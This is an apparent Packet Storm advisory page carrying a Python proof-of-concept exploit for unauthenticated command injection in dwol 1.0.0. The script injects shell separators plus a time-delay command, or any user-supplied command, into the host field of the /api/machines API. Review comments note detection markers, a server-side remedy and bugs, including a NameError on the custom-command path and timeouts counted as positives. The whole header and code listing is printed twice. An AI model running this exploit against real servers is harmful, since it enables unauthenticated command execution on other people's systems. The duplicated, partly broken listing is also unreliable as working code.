Description
This Python script is a security auditing tool designed to assess a potential unauthenticated command injection vulnerability in dwol. It interacts with the target application's API to register test machines and inject controlled payloads into the host parameter to determine whether arbitrary operating system commands can be executed without authentication.
Basic Information
ID
PACKETSTORM:222361
Published
Jun 1, 2026 at 00:00
Affected Product
dwol
Affected Versions
1.0.0 (the version named in the advisory title; other versions are not stated on this page)
==================================================================================================================================
| # Title : dwol v1.0.0 Unauthenticated Command Injection Auditor and Verification Tool |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://github.com/dhjz/dwol/releases/download/1.0.0/dwol.exe.zip |
==================================================================================================================================
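[+] Summary : This Python script is a security auditing tool designed to assess a potential unauthenticated command injection vulnerability in dwol.
It uses the target application's API to register test machines whose host parameter carries a shell command separator followed by a command, in order to determine
whether arbitrary operating system commands can be executed without authentication. The default check is time-based: it compares the response time of /api/status
with a 5-second delay command, so a slow or unresponsive server can also produce a positive result.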
[+] POC :
#!/usr/bin/env python3
import sys
import time
import json
import random
import string
import requests
import argparse
import urllib3
from typing import Dict, List, Optional, Tuple
from datetime import datetime
from urllib.parse import urlparse
# Suppresses urllib3's InsecureRequestWarning for the whole process. No request
# in this listing passes verify=False, so certificate verification stays at the
# requests default and this call has no visible effect here.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# NOTE(review): the published listing lost its indentation; the nesting below is
# reconstructed from the syntax and should be checked against the original file.
class DWOExploit:
    """Client for the time-based command-injection check against dwol's HTTP API.

    Each probe registers a throwaway machine through POST {target}/api/machines
    with a shell separator and a command appended to the ``host`` field, requests
    {target}/api/status, times the response, then deletes the machine record.
    None of the requests carries credentials or a token.

    Observable on the server side (useful for log review and detection rules):
    a fixed User-Agent ending in ``DWOL-Logic-Fixed/2.0``, machine names that
    start with ``audit_node_``, and ``host`` values that start with
    ``127.0.0.1 `` followed by one of ``&``, ``&&``, ``|`` or ``;``.

    NOTE(review): the server code is not on this page. The check only makes
    sense if dwol places ``host`` into an OS command line without validation
    when the status endpoint is served -- confirm against the dwol source. If
    so, the server-side remedy is to accept only a hostname or IP literal in
    ``host``, run the helper process without a shell, and require
    authentication on /api/machines.
    """

    def __init__(self, target: str, verbose: bool = False,
                 callback_host: Optional[str] = None,
                 callback_port: int = 4444):
        """Store the target base URL and prepare one shared HTTP session.

        Args:
            target: Base URL of the dwol instance; a trailing slash is removed.
            verbose: When true, add_machine logs the ``host`` value it sends.
            callback_host: Stored but not read anywhere else in this listing.
            callback_port: Stored but not read anywhere else in this listing.
        """
        self.target = target.rstrip('/')
        self.verbose = verbose
        self.callback_host = callback_host
        self.callback_port = callback_port
        self.session = requests.Session()
        # Every request from this session carries the same User-Agent string,
        # which makes the tool's traffic easy to pick out of access logs.
        self.session.headers.update({
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) DWOL-Logic-Fixed/2.0',
            'Content-Type': 'application/json'
        })
        self.api_machines = f"{self.target}/api/machines"
        self.api_status = f"{self.target}/api/status"
        # Ids of machine records this run created and has not yet deleted.
        self.created_machines = []

    def _log(self, message: str, level: str = "INFO"):
        """Print ``message`` with an HH:MM:SS timestamp and a per-level symbol.

        Levels missing from the symbol table fall back to ``*``.
        """
        timestamp = datetime.now().strftime("%H:%M:%S")
        symbols = {"ERROR": "✗", "SUCCESS": "✓", "WARNING": "!", "COMMAND": "$", "INFO": "*"}
        print(f"[{timestamp}] [{symbols.get(level, '*')}] {message}")

    def _generate_machine_id(self) -> str:
        """Return 8 random lowercase letters/digits used as the record id."""
        # random.choices is not a cryptographic source; the id is only a label.
        return ''.join(random.choices(string.ascii_lowercase + string.digits, k=8))

    def _generate_random_mac(self) -> str:
        """Return six random octets as a colon-separated lowercase hex string."""
        return ':'.join(['%02x' % random.randint(0, 255) for _ in range(6)])

    def _get_time_payloads(self, command: str, os_type: str) -> List[str]:
        """Build the four ``host`` values tried for ``command``.

        Every value starts with ``127.0.0.1 `` and appends a shell separator
        plus the command. ``os_type == "windows"`` selects the first list; any
        other value selects the second. A server that validates ``host`` as a
        hostname or IP literal rejects all of them.
        """
        if os_type == "windows":
            return [
                f"127.0.0.1 & {command}",
                f"127.0.0.1 && {command}",
                f"127.0.0.1 | {command}",
                f"127.0.0.1 & cmd /c {command}"
            ]
        else:
            return [
                f"127.0.0.1 ; {command}",
                f"127.0.0.1 && {command}",
                f"127.0.0.1 | {command}",
                f"127.0.0.1 & {command}"
            ]

    def add_machine(self, machine_id: str, name: str, mac: str, host: str, port: int = 9) -> bool:
        """POST one machine record to /api/machines.

        Returns:
            True on HTTP 200 or 201, in which case the id is remembered for
            cleanup. False on any other status, or on a request error (which
            is also logged).
        """
        payload = {
            "id": machine_id,
            "name": name,
            "mac": mac,
            "host": host,
            "port": port
        }
        try:
            if self.verbose:
                self._log(f"Sending registration payload with host config: {host}", "INFO")
            response = self.session.post(self.api_machines, json=payload, timeout=10)
            if response.status_code in [200, 201]:
                self.created_machines.append(machine_id)
                return True
            # Other status codes are treated as failure without a log line.
            return False
        except requests.RequestException as e:
            self._log(f"Connection failed during node creation: {e}", "ERROR")
            return False

    def trigger_command(self, expected_delay: int = 0) -> Tuple[bool, float]:
        """GET /api/status and report (success flag, elapsed seconds).

        The request timeout is ``expected_delay + 5`` seconds. Elapsed time is
        taken from time.time(), i.e. the wall clock.

        Returns:
            (True, elapsed) for any HTTP 200 and also for a client-side
            timeout; (False, elapsed) for other status codes; (False, 0.0) for
            other request errors.
        """
        start_time = time.time()
        try:
            response = self.session.get(self.api_status, timeout=expected_delay + 5)
            elapsed = time.time() - start_time
            if response.status_code == 200:
                # Both paths below return the same tuple, so the delay
                # comparison here does not change the result; the caller
                # applies the threshold.
                if expected_delay > 0 and elapsed >= expected_delay:
                    return True, elapsed
                return True, elapsed
            return False, elapsed
        except requests.exceptions.Timeout:
            # A timeout is reported as success, so a hung or overloaded server
            # looks the same as a delay caused by the injected command.
            elapsed = time.time() - start_time
            return True, elapsed
        except requests.RequestException:
            return False, 0.0

    def execute_single_payload(self, base_command: str, os_type: str, delay_check: int = 0) -> bool:
        """Try each ``host`` variant in turn until one is counted as a hit.

        For every variant: register a machine, call trigger_command, delete
        the machine again. With ``delay_check > 0`` a hit requires the status
        request to have taken at least ``delay_check`` seconds. With
        ``delay_check == 0`` any successful status request counts as a hit,
        which by itself does not show that the command ran.

        No baseline response time is measured, so a status endpoint that is
        slow for unrelated reasons is also reported as a hit.

        Returns:
            True on the first hit, False when no variant produced one (this
            includes the case where every registration failed).
        """
        payloads = self._get_time_payloads(base_command, os_type)
        for idx, encoded_host in enumerate(payloads):
            machine_id = self._generate_machine_id()
            # The fixed "audit_node_" prefix is visible in the stored records.
            name = f"audit_node_{machine_id}"
            mac = self._generate_random_mac()
            self._log(f"Attempting injection methodology #{idx + 1}...")
            if self.add_machine(machine_id, name, mac, encoded_host):
                success, duration = self.trigger_command(expected_delay=delay_check)
                self.cleanup_single(machine_id)
                if success:
                    if delay_check > 0 and duration < delay_check:
                        continue
                    self._log(f"Successful execution verification confirmed via pattern #{idx + 1}! (Duration: {duration:.2f}s)", "SUCCESS")
                    return True
            time.sleep(0.5)
        return False

    def cleanup_single(self, machine_id: str):
        """Send DELETE for one machine record and forget its id.

        Only the machine record created by this tool is removed. Server access
        logs and any effect of an injected command are left as they are. The
        response status is not checked, and request errors are swallowed (the
        id then stays in ``created_machines``).
        """
        try:
            self.session.delete(f"{self.api_machines}/{machine_id}", timeout=5)
            if machine_id in self.created_machines:
                self.created_machines.remove(machine_id)
        except requests.RequestException:
            pass

    def cleanup_all(self):
        """Delete every machine record still listed in ``created_machines``."""
        if not self.created_machines:
            self._log("No lingering remote tracking configurations found. Environment clean.", "SUCCESS")
            return
        self._log(f"Cleaning up {len(self.created_machines)} registered active verification sessions...")
        # Iterate over a copy because cleanup_single mutates the list.
        for mid in list(self.created_machines):
            self.cleanup_single(mid)
# NOTE(review): the published listing lost its indentation; the nesting below is
# reconstructed from the syntax and should be checked against the original file.
def main():
    """Parse the command line and run one check against the given dwol URL.

    Without ``-c`` the default time-delay check runs: the delay command is
    ``ping -n 6 127.0.0.1`` for ``--os windows`` and ``sleep 5`` otherwise, and
    the threshold is 5 seconds. Remaining machine records are deleted in the
    ``finally`` clause.
    """
    parser = argparse.ArgumentParser(description="dwol v1.0.0 - Unauthenticated Command Injection Structural Auditor")
    parser.add_argument("-t", "--target", required=True, help="Target instance URL (e.g., http://192.168.1.100:999)")
    parser.add_argument("-c", "--command", help="Custom command string to deploy during audit context")
    parser.add_argument("--os", choices=['windows', 'linux'], default='windows', help="Target OS platform deployment (default: windows)")
    parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose trace metrics")
    args = parser.parse_args()
    exploit = DWOExploit(target=args.target, verbose=args.verbose)
    try:
        if args.command:
            # NOTE(review): `self` is not defined in this function, so this
            # line raises NameError before any request is sent. Only
            # KeyboardInterrupt is caught below, so the error propagates after
            # the `finally` clause has run.
            self._log(f"Deploying operational test for command: {args.command}")
            exploit.execute_single_payload(args.command, args.os)
        else:
            exploit._log("No customized execution argument detected. Launching time-delay integrity audit...")
            delay_target = 5
            audit_cmd = f"ping -n {delay_target + 1} 127.0.0.1" if args.os == "windows" else f"sleep {delay_target}"
            is_vuln = exploit.execute_single_payload(audit_cmd, args.os, delay_check=delay_target)
            print("\n" + "=" * 60)
            if is_vuln:
                # A positive verdict rests on a single response-time sample;
                # a client-side timeout is counted as positive as well.
                exploit._log("AUDIT REPORT: System is highly vulnerable to unauthenticated input serialization manipulation.", "ERROR")
            else:
                # This verdict is also printed when every registration request
                # failed (for example an unreachable target), so it is not
                # evidence that the instance validates `host`.
                exploit._log("AUDIT REPORT: Target node parameters handled the injection sequences structurally.", "SUCCESS")
            print("=" * 60 + "\n")
    except KeyboardInterrupt:
        exploit._log("Operation aborted by user request.", "WARNING")
    finally:
        exploit.cleanup_all()


# Run main() only when the file is executed as a script.
if __name__ == "__main__":
    main()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================
| # Title : dwol v1.0.0 Unauthenticated Command Injection Auditor and Verification Tool |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://github.com/dhjz/dwol/releases/download/1.0.0/dwol.exe.zip |
==================================================================================================================================
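[+] Summary : This Python script is a security auditing tool designed to assess a potential unauthenticated command injection vulnerability in dwol.
It uses the target application's API to register test machines whose host parameter carries a shell command separator followed by a command, in order to determine
whether arbitrary operating system commands can be executed without authentication. The default check is time-based: it compares the response time of /api/status
with a 5-second delay command, so a slow or unresponsive server can also produce a positive result.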
[+] POC :
#!/usr/bin/env python3
import sys
import time
import json
import random
import string
import requests
import argparse
import urllib3
from typing import Dict, List, Optional, Tuple
from datetime import datetime
from urllib.parse import urlparse
# Suppresses urllib3's InsecureRequestWarning for the whole process. No request
# in this listing passes verify=False, so certificate verification stays at the
# requests default and this call has no visible effect here.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# NOTE(review): the published listing lost its indentation; the nesting below is
# reconstructed from the syntax and should be checked against the original file.
class DWOExploit:
    """Client for the time-based command-injection check against dwol's HTTP API.

    Each probe registers a throwaway machine through POST {target}/api/machines
    with a shell separator and a command appended to the ``host`` field, requests
    {target}/api/status, times the response, then deletes the machine record.
    None of the requests carries credentials or a token.

    Observable on the server side (useful for log review and detection rules):
    a fixed User-Agent ending in ``DWOL-Logic-Fixed/2.0``, machine names that
    start with ``audit_node_``, and ``host`` values that start with
    ``127.0.0.1 `` followed by one of ``&``, ``&&``, ``|`` or ``;``.

    NOTE(review): the server code is not on this page. The check only makes
    sense if dwol places ``host`` into an OS command line without validation
    when the status endpoint is served -- confirm against the dwol source. If
    so, the server-side remedy is to accept only a hostname or IP literal in
    ``host``, run the helper process without a shell, and require
    authentication on /api/machines.
    """

    def __init__(self, target: str, verbose: bool = False,
                 callback_host: Optional[str] = None,
                 callback_port: int = 4444):
        """Store the target base URL and prepare one shared HTTP session.

        Args:
            target: Base URL of the dwol instance; a trailing slash is removed.
            verbose: When true, add_machine logs the ``host`` value it sends.
            callback_host: Stored but not read anywhere else in this listing.
            callback_port: Stored but not read anywhere else in this listing.
        """
        self.target = target.rstrip('/')
        self.verbose = verbose
        self.callback_host = callback_host
        self.callback_port = callback_port
        self.session = requests.Session()
        # Every request from this session carries the same User-Agent string,
        # which makes the tool's traffic easy to pick out of access logs.
        self.session.headers.update({
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) DWOL-Logic-Fixed/2.0',
            'Content-Type': 'application/json'
        })
        self.api_machines = f"{self.target}/api/machines"
        self.api_status = f"{self.target}/api/status"
        # Ids of machine records this run created and has not yet deleted.
        self.created_machines = []

    def _log(self, message: str, level: str = "INFO"):
        """Print ``message`` with an HH:MM:SS timestamp and a per-level symbol.

        Levels missing from the symbol table fall back to ``*``.
        """
        timestamp = datetime.now().strftime("%H:%M:%S")
        symbols = {"ERROR": "✗", "SUCCESS": "✓", "WARNING": "!", "COMMAND": "$", "INFO": "*"}
        print(f"[{timestamp}] [{symbols.get(level, '*')}] {message}")

    def _generate_machine_id(self) -> str:
        """Return 8 random lowercase letters/digits used as the record id."""
        # random.choices is not a cryptographic source; the id is only a label.
        return ''.join(random.choices(string.ascii_lowercase + string.digits, k=8))

    def _generate_random_mac(self) -> str:
        """Return six random octets as a colon-separated lowercase hex string."""
        return ':'.join(['%02x' % random.randint(0, 255) for _ in range(6)])

    def _get_time_payloads(self, command: str, os_type: str) -> List[str]:
        """Build the four ``host`` values tried for ``command``.

        Every value starts with ``127.0.0.1 `` and appends a shell separator
        plus the command. ``os_type == "windows"`` selects the first list; any
        other value selects the second. A server that validates ``host`` as a
        hostname or IP literal rejects all of them.
        """
        if os_type == "windows":
            return [
                f"127.0.0.1 & {command}",
                f"127.0.0.1 && {command}",
                f"127.0.0.1 | {command}",
                f"127.0.0.1 & cmd /c {command}"
            ]
        else:
            return [
                f"127.0.0.1 ; {command}",
                f"127.0.0.1 && {command}",
                f"127.0.0.1 | {command}",
                f"127.0.0.1 & {command}"
            ]

    def add_machine(self, machine_id: str, name: str, mac: str, host: str, port: int = 9) -> bool:
        """POST one machine record to /api/machines.

        Returns:
            True on HTTP 200 or 201, in which case the id is remembered for
            cleanup. False on any other status, or on a request error (which
            is also logged).
        """
        payload = {
            "id": machine_id,
            "name": name,
            "mac": mac,
            "host": host,
            "port": port
        }
        try:
            if self.verbose:
                self._log(f"Sending registration payload with host config: {host}", "INFO")
            response = self.session.post(self.api_machines, json=payload, timeout=10)
            if response.status_code in [200, 201]:
                self.created_machines.append(machine_id)
                return True
            # Other status codes are treated as failure without a log line.
            return False
        except requests.RequestException as e:
            self._log(f"Connection failed during node creation: {e}", "ERROR")
            return False

    def trigger_command(self, expected_delay: int = 0) -> Tuple[bool, float]:
        """GET /api/status and report (success flag, elapsed seconds).

        The request timeout is ``expected_delay + 5`` seconds. Elapsed time is
        taken from time.time(), i.e. the wall clock.

        Returns:
            (True, elapsed) for any HTTP 200 and also for a client-side
            timeout; (False, elapsed) for other status codes; (False, 0.0) for
            other request errors.
        """
        start_time = time.time()
        try:
            response = self.session.get(self.api_status, timeout=expected_delay + 5)
            elapsed = time.time() - start_time
            if response.status_code == 200:
                # Both paths below return the same tuple, so the delay
                # comparison here does not change the result; the caller
                # applies the threshold.
                if expected_delay > 0 and elapsed >= expected_delay:
                    return True, elapsed
                return True, elapsed
            return False, elapsed
        except requests.exceptions.Timeout:
            # A timeout is reported as success, so a hung or overloaded server
            # looks the same as a delay caused by the injected command.
            elapsed = time.time() - start_time
            return True, elapsed
        except requests.RequestException:
            return False, 0.0

    def execute_single_payload(self, base_command: str, os_type: str, delay_check: int = 0) -> bool:
        """Try each ``host`` variant in turn until one is counted as a hit.

        For every variant: register a machine, call trigger_command, delete
        the machine again. With ``delay_check > 0`` a hit requires the status
        request to have taken at least ``delay_check`` seconds. With
        ``delay_check == 0`` any successful status request counts as a hit,
        which by itself does not show that the command ran.

        No baseline response time is measured, so a status endpoint that is
        slow for unrelated reasons is also reported as a hit.

        Returns:
            True on the first hit, False when no variant produced one (this
            includes the case where every registration failed).
        """
        payloads = self._get_time_payloads(base_command, os_type)
        for idx, encoded_host in enumerate(payloads):
            machine_id = self._generate_machine_id()
            # The fixed "audit_node_" prefix is visible in the stored records.
            name = f"audit_node_{machine_id}"
            mac = self._generate_random_mac()
            self._log(f"Attempting injection methodology #{idx + 1}...")
            if self.add_machine(machine_id, name, mac, encoded_host):
                success, duration = self.trigger_command(expected_delay=delay_check)
                self.cleanup_single(machine_id)
                if success:
                    if delay_check > 0 and duration < delay_check:
                        continue
                    self._log(f"Successful execution verification confirmed via pattern #{idx + 1}! (Duration: {duration:.2f}s)", "SUCCESS")
                    return True
            time.sleep(0.5)
        return False

    def cleanup_single(self, machine_id: str):
        """Send DELETE for one machine record and forget its id.

        Only the machine record created by this tool is removed. Server access
        logs and any effect of an injected command are left as they are. The
        response status is not checked, and request errors are swallowed (the
        id then stays in ``created_machines``).
        """
        try:
            self.session.delete(f"{self.api_machines}/{machine_id}", timeout=5)
            if machine_id in self.created_machines:
                self.created_machines.remove(machine_id)
        except requests.RequestException:
            pass

    def cleanup_all(self):
        """Delete every machine record still listed in ``created_machines``."""
        if not self.created_machines:
            self._log("No lingering remote tracking configurations found. Environment clean.", "SUCCESS")
            return
        self._log(f"Cleaning up {len(self.created_machines)} registered active verification sessions...")
        # Iterate over a copy because cleanup_single mutates the list.
        for mid in list(self.created_machines):
            self.cleanup_single(mid)
# NOTE(review): the published listing lost its indentation; the nesting below is
# reconstructed from the syntax and should be checked against the original file.
def main():
    """Parse the command line and run one check against the given dwol URL.

    Without ``-c`` the default time-delay check runs: the delay command is
    ``ping -n 6 127.0.0.1`` for ``--os windows`` and ``sleep 5`` otherwise, and
    the threshold is 5 seconds. Remaining machine records are deleted in the
    ``finally`` clause.
    """
    parser = argparse.ArgumentParser(description="dwol v1.0.0 - Unauthenticated Command Injection Structural Auditor")
    parser.add_argument("-t", "--target", required=True, help="Target instance URL (e.g., http://192.168.1.100:999)")
    parser.add_argument("-c", "--command", help="Custom command string to deploy during audit context")
    parser.add_argument("--os", choices=['windows', 'linux'], default='windows', help="Target OS platform deployment (default: windows)")
    parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose trace metrics")
    args = parser.parse_args()
    exploit = DWOExploit(target=args.target, verbose=args.verbose)
    try:
        if args.command:
            # NOTE(review): `self` is not defined in this function, so this
            # line raises NameError before any request is sent. Only
            # KeyboardInterrupt is caught below, so the error propagates after
            # the `finally` clause has run.
            self._log(f"Deploying operational test for command: {args.command}")
            exploit.execute_single_payload(args.command, args.os)
        else:
            exploit._log("No customized execution argument detected. Launching time-delay integrity audit...")
            delay_target = 5
            audit_cmd = f"ping -n {delay_target + 1} 127.0.0.1" if args.os == "windows" else f"sleep {delay_target}"
            is_vuln = exploit.execute_single_payload(audit_cmd, args.os, delay_check=delay_target)
            print("\n" + "=" * 60)
            if is_vuln:
                # A positive verdict rests on a single response-time sample;
                # a client-side timeout is counted as positive as well.
                exploit._log("AUDIT REPORT: System is highly vulnerable to unauthenticated input serialization manipulation.", "ERROR")
            else:
                # This verdict is also printed when every registration request
                # failed (for example an unreachable target), so it is not
                # evidence that the instance validates `host`.
                exploit._log("AUDIT REPORT: Target node parameters handled the injection sequences structurally.", "SUCCESS")
            print("=" * 60 + "\n")
    except KeyboardInterrupt:
        exploit._log("Operation aborted by user request.", "WARNING")
    finally:
        exploit.cleanup_all()


# Run main() only when the file is executed as a script.
if __name__ == "__main__":
    main()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================